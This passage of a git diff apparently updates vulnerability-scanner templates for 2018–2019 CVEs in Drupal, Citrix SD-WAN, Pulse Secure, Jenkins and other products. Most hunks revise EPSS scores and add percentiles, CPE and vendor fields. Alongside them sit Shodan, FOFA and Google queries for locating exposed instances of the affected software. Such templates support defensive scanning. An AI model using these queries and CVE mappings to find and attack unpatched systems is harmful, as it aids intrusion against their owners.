cvss-score: 9.8 cve-id: CVE-2018-7600 cwe-id: CWE-20 - epss-score: 0.9757 + epss-score: 0.97553 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + epss-percentile: 0.99994 metadata: max-request: 1 shodan-query: http.component:"drupal" diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index f33c92d571..a7e9233e51 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -15,8 +15,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-7602 - epss-score: 0.97474 + epss-score: 0.97471 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + epss-percentile: 0.99942 metadata: max-request: 4 shodan-query: http.component:"drupal" diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 3207bc02d2..92e74e1589 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -8,15 +8,22 @@ info: reference: - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-7653 + - https://github.com/ponyma233/YzmCMS/blob/master/YzmCMS_3.6_bug.md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 + cve-id: CVE-2018-7653 cwe-id: CWE-79 + epss-score: 0.00797 + cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* + epss-percentile: 0.79437 metadata: max-request: 1 fofa-query: title="YzmCMS" shodan-query: title:"YzmCMS" - tags: cve,cve2018,yzmcms,cms,xss + vendor: yzmcms + product: yzmcms + tags: packetstorm,cve,cve2018,yzmcms,cms,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 3dee8efd4f..5251c442d2 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-200 epss-score: 0.00286 cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* + epss-percentile: 0.64709 metadata: max-request: 2 vendor: couchcms diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 7484fe09fa..6a792813d7 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-352 epss-score: 0.73235 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* + epss-percentile: 0.97671 metadata: max-request: 1 vendor: dedecms diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 044b6e35ef..8284e89463 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-7719 cwe-id: CWE-22 - epss-score: 0.10678 + epss-score: 0.09221 cpe: cpe:2.3:a:acrolinx:acrolinx_server:*:*:*:*:*:*:*:* + epss-percentile: 0.93888 metadata: max-request: 1 vendor: acrolinx diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 4afe719a03..6672e0dbf0 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -21,8 +21,9 @@ info: cvss-score: 6.1 cve-id: CVE-2018-8006 cwe-id: CWE-79 - epss-score: 0.97273 + epss-score: 0.97239 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* + epss-percentile: 0.99756 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index de54a2c9a2..430fcdd63d 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-8033 cwe-id: CWE-200 - epss-score: 0.00242 + epss-score: 0.20111 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* + epss-percentile: 0.95689 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index e942e4d665..55db64892d 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -15,8 +15,9 @@ info: cvss-score: 8.1 cve-id: CVE-2018-8715 cwe-id: CWE-287 - epss-score: 0.00844 + epss-score: 0.05837 cpe: cpe:2.3:a:embedthis:appweb:*:*:*:*:*:*:*:* + epss-percentile: 0.92425 metadata: max-request: 1 vendor: embedthis diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 79c52d8d86..7c43e763ee 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-8719 cwe-id: CWE-532 - epss-score: 0.03728 + epss-score: 0.03177 cpe: cpe:2.3:a:wpsecurityauditlog:wp_security_audit_log:3.1.1:*:*:*:*:wordpress:*:* + epss-percentile: 0.89877 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index 6ee0e136f4..ee6c67333b 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01105 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* + epss-percentile: 0.8267 metadata: max-request: 1 vendor: mirasys diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 1b8f82c1be..5cad1eb764 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2018-8770 cwe-id: CWE-200 - epss-score: 0.00282 + epss-score: 0.00197 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* + epss-percentile: 0.5678 metadata: max-request: 1 vendor: cobub diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index abbeb190c7..487600f951 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-22 epss-score: 0.11263 cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.94454 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index 5ec77cdc99..1e8b84d719 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2018-9161 cwe-id: CWE-798 - epss-score: 0.23131 + epss-score: 0.26342 cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* + epss-percentile: 0.96118 metadata: max-request: 1 vendor: prismaindustriale diff --git a/http/cves/2018/CVE-2018-9205.yaml b/http/cves/2018/CVE-2018-9205.yaml index 447b8395dc..8556ebcaee 100644 --- a/http/cves/2018/CVE-2018-9205.yaml +++ b/http/cves/2018/CVE-2018-9205.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2018-9205 cwe-id: CWE-22 - epss-score: 0.0389 + epss-score: 0.0276 cpe: cpe:2.3:a:drupal:avatar_uploader:7.x-1.0:beta8:*:*:*:*:*:* + epss-percentile: 0.89249 metadata: max-request: 1 shodan-query: http.component:"drupal" diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index d958052f67..13fa5e18d7 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-178 epss-score: 0.01342 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* + epss-percentile: 0.84419 metadata: max-request: 1 vendor: etherpad diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index 7c12571bf2..01868660b5 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -18,8 +18,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9995 - epss-score: 0.94839 + epss-score: 0.93843 cpe: cpe:2.3:o:tbkvision:tbk-dvr4216_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.98791 metadata: max-request: 1 vendor: tbkvision diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 58c8db2af9..29547d4b76 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -19,8 +19,9 @@ info: cvss-score: 7.2 cve-id: CVE-2019-0193 cwe-id: CWE-94 - epss-score: 0.94457 + epss-score: 0.95869 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* + epss-percentile: 0.99213 metadata: max-request: 2 vendor: apache diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index e2a08e0d0a..5bf14df652 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -19,13 +19,13 @@ info: cwe-id: CWE-79 epss-score: 0.01651 cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* + epss-percentile: 0.86008 metadata: max-request: 2 shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat tags: apache,xss,tomcat,seclists,edb,cve,cve2019 - variables: payload: "" diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 7112ba0dcc..c1c8500cad 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -16,14 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-1321 - epss-score: 0.90834 + epss-score: 0.92614 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* + epss-percentile: 0.98622 metadata: max-request: 1 vendor: apache product: struts tags: tenable,packetstorm,struts,rce,cve,cve2019,apache - variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 756b87d5c1..90b5cc6ebb 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-502 epss-score: 0.97358 cpe: cpe:2.3:a:kentico:kentico:*:*:*:*:*:*:*:* + epss-percentile: 0.9984 metadata: max-request: 1 vendor: kentico diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index cdc8861edd..3f1c45f0f7 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -16,8 +16,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10092 cwe-id: CWE-79 - epss-score: 0.00757 + epss-score: 0.01582 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + epss-percentile: 0.8571 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 901650d6dd..a41adf2ad6 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10098 cwe-id: CWE-601 - epss-score: 0.07268 + epss-score: 0.08306 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + epss-percentile: 0.9354 metadata: max-request: 1 vendor: apache diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index e1bf2b71f9..bddf843827 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00129 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* + epss-percentile: 0.46935 metadata: max-request: 1 google-query: inurl:"/timesheet/login.php" diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index c31a2e7fd7..ef2c47a0a3 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00198 cpe: cpe:2.3:a:cmsmadesimple:bable\:multilingual_site:*:*:*:*:*:cms_made_simple:*:* + epss-percentile: 0.56887 metadata: max-request: 1 vendor: cmsmadesimple diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 90557076ad..678fe55d49 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-10232 cwe-id: CWE-89 - epss-score: 0.16114 + epss-score: 0.21939 cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:* + epss-percentile: 0.95827 metadata: max-request: 2 vendor: teclib-edition diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 87d2ee0c55..5e1d71c203 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00572 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* + epss-percentile: 0.75075 metadata: max-request: 2 shodan-query: http.favicon.hash:81586312 diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index bc9f0629da..b85924998f 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2019-10475 cwe-id: CWE-79 - epss-score: 0.9726 + epss-score: 0.97301 cpe: cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:* + epss-percentile: 0.99796 metadata: max-request: 1 framework: jenkins diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index 9b04907b7d..aea3a1502e 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-10692 cwe-id: CWE-89 - epss-score: 0.97382 + epss-score: 0.9737 cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.9985 metadata: max-request: 1 verified: true diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index f6d825f5ce..69e24fcf69 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.0042 cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:* + epss-percentile: 0.7095 metadata: max-request: 1 shodan-query: http.html:"Blogengine.net" diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index bb3f2cbf4d..cc4fdc2921 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -16,6 +16,7 @@ info: cve-id: CVE-2019-10758 epss-score: 0.97345 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* + epss-percentile: 0.99831 metadata: max-request: 1 shodan-query: http.title:"Mongo Express" diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 4930f61752..d33f3812f3 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.01775 cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* + epss-percentile: 0.86476 metadata: max-request: 1 vendor: softvelum diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 0c3bd4c6d5..b38d1eec41 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -16,9 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L cvss-score: 8.2 cve-id: CVE-2019-11248 - cwe-id: CWE-862,CWE-419 + cwe-id: CWE-419,CWE-862 epss-score: 0.74826 cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* + epss-percentile: 0.97731 metadata: max-request: 2 vendor: kubernetes diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 9ba2a95078..2c4bdcb923 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.1896 cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.95583 metadata: max-request: 2 shodan-query: http.html:"pCOWeb" diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 19a7ccf520..e021cdea92 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -16,8 +16,9 @@ info: cvss-score: 10 cve-id: CVE-2019-11510 cwe-id: CWE-22 - epss-score: 0.97317 + epss-score: 0.97289 cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:* + epss-percentile: 0.99788 metadata: max-request: 1 vendor: pulsesecure diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 5feeaadf84..cd182ab915 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -14,8 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 - epss-score: 0.97491 + epss-score: 0.97501 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* + epss-percentile: 0.99963 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 821ebf58e4..32f731b520 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-74 epss-score: 0.97434 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* + epss-percentile: 0.99907 metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index 60d46b7ecf..6bc23f90c3 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -24,6 +24,7 @@ info: cwe-id: CWE-79 epss-score: 0.00321 cpe: cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:* + epss-percentile: 0.66852 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2019/CVE-2019-12276.yaml b/http/cves/2019/CVE-2019-12276.yaml index 98de63aa1a..c59f7cf742 100644 --- a/http/cves/2019/CVE-2019-12276.yaml +++ b/http/cves/2019/CVE-2019-12276.yaml @@ -19,8 +19,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12276 cwe-id: CWE-22 - epss-score: 0.96045 + epss-score: 0.96216 cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* + epss-percentile: 0.99307 metadata: max-request: 1 vendor: grandnode diff --git a/http/cves/2019/CVE-2019-12314.yaml b/http/cves/2019/CVE-2019-12314.yaml index 43dfc2759e..89e2a7c560 100644 --- a/http/cves/2019/CVE-2019-12314.yaml +++ b/http/cves/2019/CVE-2019-12314.yaml @@ -14,8 +14,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12314 cwe-id: CWE-22 - epss-score: 0.22126 + epss-score: 0.23499 cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* + epss-percentile: 0.95935 metadata: max-request: 1 vendor: deltek diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index d7205f4479..b96f0d1314 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00269 cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* + epss-percentile: 0.63646 metadata: max-request: 1 vendor: webport diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 0adba67d3e..e8be46f619 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00642 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.7661 metadata: max-request: 1 shodan-query: http.title:"ZyWall" diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 77f56eadf5..0de42fd24e 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-425 epss-score: 0.00481 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.72824 metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 27a844537c..cd97bb169b 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2019-12593 cwe-id: CWE-22 - epss-score: 0.12314 + epss-score: 0.13201 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* + epss-percentile: 0.94827 metadata: max-request: 2 google-query: Powered By IceWarp 10.4.4 diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index de6c8d5f3b..c3e3962566 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-352 epss-score: 0.00989 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + epss-percentile: 0.81614 metadata: max-request: 1 vendor: phpmyadmin diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index ee9ecbb4d4..585bde5909 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12725 cwe-id: CWE-78 - epss-score: 0.96689 + epss-score: 0.96479 cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* + epss-percentile: 0.99394 metadata: max-request: 1 vendor: zeroshell diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index d1f1e649e7..8d06c9c0ea 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.20689 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* + epss-percentile: 0.95731 metadata: max-request: 1 shodan-query: http.html:LiveZilla diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index ad3aa9a0fe..b2cf874532 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.97433 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* + epss-percentile: 0.99906 metadata: max-request: 2 shodan-query: http.title:"Citrix SD-WAN" diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index e6b9d5dac3..d764b34ed0 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.97433 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* + epss-percentile: 0.99906 metadata: max-request: 2 shodan-query: http.title:"Citrix SD-WAN" diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 9ffe3d34cf..daa9bf85a0 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.97433 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* + epss-percentile: 0.99906 metadata: max-request: 2 shodan-query: http.title:"Citrix SD-WAN" diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index b33fda2f7e..04576616b1 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-78 epss-score: 0.97433 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* + epss-percentile: 0.99906 metadata: max-request: 2 shodan-query: http.title:"Citrix SD-WAN" diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 05a269f611..f205671200 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-22 epss-score: 0.95724 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* + epss-percentile: 0.99172 metadata: max-request: 3 shodan-query: http.title:"Citrix SD-WAN" diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 5a8f83ff5d..840ed7884f 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-306 epss-score: 0.03717 cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* + epss-percentile: 0.90578 metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 2ab2ded2f7..7dfca65348 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0014 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* + epss-percentile: 0.4905 metadata: max-request: 1 vendor: mindpalette diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index 31a3188679..a499f582d2 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-22 epss-score: 0.02107 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* + epss-percentile: 0.87729 metadata: max-request: 2 vendor: getflightpath diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index afbf01c4e2..c71d33fe3b 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-89 epss-score: 0.41054 cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* + epss-percentile: 0.96803 metadata: max-request: 1 vendor: lansweeper diff --git 